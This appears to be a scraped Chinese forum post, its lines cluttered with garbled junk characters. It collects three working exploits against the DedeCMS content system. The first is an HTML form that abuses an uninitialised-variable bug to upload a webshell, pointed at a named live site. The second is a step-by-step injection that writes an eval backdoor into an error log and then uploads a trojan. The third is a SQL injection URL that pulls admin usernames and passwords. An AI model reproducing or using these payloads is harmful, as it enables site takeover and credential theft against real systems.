4 l% A1 }0 T/ j3 U) H8 V3 @% L- a* p9 i" |6 J3 t# N' E
8 P! y+ T8 y4 G: @, |3 J* W+ j

" e( v: L& x  X7 G( i6 K. V
* C1 S# g4 l0 I. |% ~0 h# ]$ `
# G1 w" v0 j& _+ \/ ^. h0 M
) \: d2 U: o; C! l  h, {4 H6 {1 U# d/ g1 ~

* Q6 q2 Q5 ]# x8 y. V( a6 E
8 G% C9 I- P4 p" k2 g) G织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
- ]8 n/ R5 y6 G" l) @<html>
4 ~3 g0 \4 A; {% B+ I# Q& J9 I<head>
! k/ p3 A* {1 B, z8 K; E<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
8 w: }; ~6 v& d: A& G</head>
8 r4 O4 v$ e; v" A+ G) ^4 S+ u: ^' y2 D<body style="FONT-SIZE: 9pt">2 q3 F+ H6 ?  I5 h5 b* x
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />4 _1 X9 a  t) K, |
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
. j: b+ }9 {1 A2 ^) K: i<input type='hidden' name='activepath' value='/data/cache/' />* b4 c( H1 R7 O7 X; f
<input type='hidden' name='cfg_basedir' value='../../' />
: `0 ^7 Y# }/ l1 ?<input type='hidden' name='cfg_imgtype' value='php' />
/ `3 V6 N9 ]8 S6 l5 \<input type='hidden' name='cfg_not_allowall' value='txt' />
. P, w5 D% Q2 X7 `) h7 H<input type='hidden' name='cfg_softtype' value='php' />9 f" t/ j9 v$ `% [- B$ e
<input type='hidden' name='cfg_mediatype' value='php' />, X( \: V- T% F
<input type='hidden' name='f' value='form1.enclosure' /># _+ @  e1 e" g
<input type='hidden' name='job' value='upload' />
7 {# o2 h6 r, Y% I1 l. Q5 D<input type='hidden' name='newname' value='fly.php' />
3 Q* ^" }/ v3 h% c0 s" R( p+ `Select U Shell <input type='file' name='uploadfile' size='25' />1 L% X* @6 `  t
<input type='submit' name='sb1' value='确定' />6 x! o) C. l% j- j+ ~4 q* }3 ?
</form>
2 v, m6 _0 Q) u* S3 y1 X<br />It's just a exp for the bug of Dedecms V55...<br />
+ v4 v  B7 x0 CNeed register_globals = on...<br />& l) i' {2 _: P/ O) d1 Y4 @2 u% k
Fun the game,get a webshell at /data/cache/fly.php...<br />
& W6 H: C2 D! A" v3 L7 b( Y; E</body>
' ^6 Z$ y! J: @' [5 a- N, f</html>3 V7 t6 N2 P  [2 }! }
& Z) V' I, Z9 E2 U

5 R$ n! @- \7 F# w, o/ h) [$ N7 F0 h1 ^8 R3 a' k
- J; s0 x9 ]5 t2 }& ~) l) B3 i: }
  [5 c1 w! i5 h

% p- O# ?, n/ s
. k3 s: \1 ?4 t9 w" j0 T* ?# I  Z. ^" k; H& W

# B/ ?; _% D+ Y0 e; {4 F9 E% z; e/ r  F% V7 G8 o1 B9 r/ A
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
8 g1 f3 N  ^, r. P利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
8 u, p9 H. q, W: U1. 访问网址:0 M" ^; D/ a- J# H1 V! K
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>/ G( v7 g; l- R) p! O0 X) a
可看见错误信息0 g$ D( Q8 l: H% E" S- N
* h9 q8 B& x' ?. j3 W+ O

/ `5 J  [' P/ |! c2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。% z, y+ R6 }& E0 x4 ^0 x: A
int(3) Error: Illegal double '1024e1024' value found during parsing- ]2 L$ E) z, u, f# P
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
& G7 e7 @3 m- r! Y
6 X- W7 F" @- n, r; X: R0 {  ]2 _; u$ z
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
- A( ]6 Z2 U' L/ D
( R+ J8 t( m: E- g# [
* L9 G9 ^5 I/ k+ c' |: q<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
& m* {* ^; e1 ?0 _: J# C# F8 ^4 D$ b/ h' F# @# m
5 d' l, |5 x1 p# B! O* Q
按确定后的看到第2步骤的信息表示文件木马上传成功.9 D4 h3 C+ \! o) ?3 w: E

. B# m' T0 |  ?2 D* R9 s8 k2 {" a% X) S

6 S, D( c$ w5 o- I6 @% }) B5 V" }( }' u8 O; L

- P- Y5 z0 u! ^6 @+ Q8 W) _8 N$ T' ]" N8 p! i' w

3 w$ W2 |; b- |, r: q" W" z2 x  W$ a  s& I6 z# O9 k% Z9 g
+ r9 n, J# M' B0 @' n8 w7 ], _1 s

. o5 z' w% C7 F' }# D9 c5 [: {/ _/ ?7 h; ~0 \- D+ \

5 X5 u" H! l2 l$ Y$ y8 \# P  Q织梦(DedeCms)plus/infosearch.php 文件注入漏洞2 s9 v2 u! p" O5 a4 P, P
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表